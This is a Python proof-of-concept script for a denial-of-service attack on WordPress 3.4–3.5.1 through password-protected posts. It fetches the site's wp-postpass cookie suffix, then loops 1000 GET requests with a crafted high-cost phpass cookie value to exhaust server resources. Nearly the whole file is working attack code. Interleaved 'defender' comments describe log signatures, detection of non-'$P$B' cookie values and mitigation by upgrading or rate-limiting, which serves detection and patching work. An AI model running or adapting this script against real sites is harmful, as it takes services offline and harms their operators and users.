wordpress-dos.py
# WordPress denial-of-service proof of concept (password-protected posts)
# Affected versions: WordPress 3.4 - 3.5.1
# Author: vnd at vndh.net
# Version by MustLive (http://websecurity.com.ua)
import httplib
import re
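def get_cookie_hash(hostname, url):
    """Return the 32-hex-digit suffix of the site's ``wp-postpass_`` cookie name.

    Posts an empty ``post_password`` form to *url* and reads the
    ``Set-Cookie`` header of the response.

    Args:
        hostname: Host to connect to over plain HTTP.
        url: Request path of the post-password handler (the caller in this
            file passes a path ending in ``wp-pass.php``).

    Returns:
        The 32 lowercase hex characters that follow ``wp-postpass_``.

    Raises:
        RuntimeError: If the response has no ``Set-Cookie`` header, or the
            header holds no ``wp-postpass_<hash>`` cookie.
    """
    headers = {'Content-type': 'application/x-www-form-urlencoded'}
    handler = httplib.HTTPConnection(hostname)
    try:
        handler.request('POST', url, 'post_password=', headers=headers)
        response = handler.getresponse()
        set_cookie = response.getheader('set-cookie')
    finally:
        # Release the socket even when the request or the read fails.
        handler.close()
    if set_cookie is None:
        raise RuntimeError('cannot fetch set-cookie header')
    # NOTE(defender): the cookie-name suffix is handed to any unauthenticated
    # client, so it is not a secret. In access logs this step shows up as a
    # POST to wp-pass.php with an empty post_password field.
    result = re.search(r'wp-postpass_([0-9a-f]{32})', set_cookie)
    if result is None:
        raise RuntimeError('cannot fetch cookie hash')
    return result.group(1)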
def send_request(hostname, post, cookie_name):
    """Send one GET for *post* carrying a crafted ``wp-postpass_`` cookie.

    The response is never read and the connection is never closed
    explicitly; nothing is returned.

    Args:
        hostname: Host to connect to over plain HTTP.
        post: Request path of the password-protected post or page.
        cookie_name: The 32-hex-digit suffix of the ``wp-postpass_`` cookie
            name, as returned by ``get_cookie_hash``.
    """
    # The cookie value is the URL-encoded form of "$P$Spaddding" ("%24" is
    # "$"; the doubled "%%" only escapes "%" for the %-format operator).
    # NOTE(defender): "$P$" is the phpass portable-hash prefix and the next
    # character encodes the hashing cost. Hashes issued by WordPress itself
    # normally start with "$P$B"; "S" selects a far higher cost, which is
    # presumably what makes each request expensive to verify on the affected
    # versions (confirm against the vendor advisory).
    # Detection: a wp-postpass_* cookie whose value does not start with
    # "$P$B", and a GET request that carries a body.
    # Mitigation: upgrade past the affected range named in the file header;
    # until then, drop or rate-limit such cookies at the proxy/WAF.
    headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name}
    handler = httplib.HTTPConnection(hostname)
    # A body is sent with the GET request, which ordinary browsers do not do.
    handler.request('GET', post, 'action=postpass&post_password=a',
                    headers=headers)
if __name__ == '__main__':
    # Script driver: fetch the cookie-name suffix once, then send a fixed
    # number of requests one after another, each on a new connection.
    # NOTE(defender): on the server this appears as a single POST to
    # wp-pass.php followed by a burst of GETs for one protected post from the
    # same client, all with the same wp-postpass_* cookie value.
    hostname = 'site'  # placeholder host name
    posturl = '/?p=4' # link to password protected post or page
    requests = 1000  # number of requests sent by the loop below
    # Build the wp-pass.php path from the leading part of posturl that the
    # pattern matches (text up to and including a "/").
    pattern = re.compile('(.+/)')
    url = pattern.search(posturl).groups()[0] + 'wp-pass.php'
    cookie_hash = get_cookie_hash(hostname, url)
    print '[+] received cookie hash: %s' % cookie_hash
    for i in xrange(requests):
        print '[+] sending request %d...' % (i + 1)
        send_request(hostname, posturl, cookie_hash)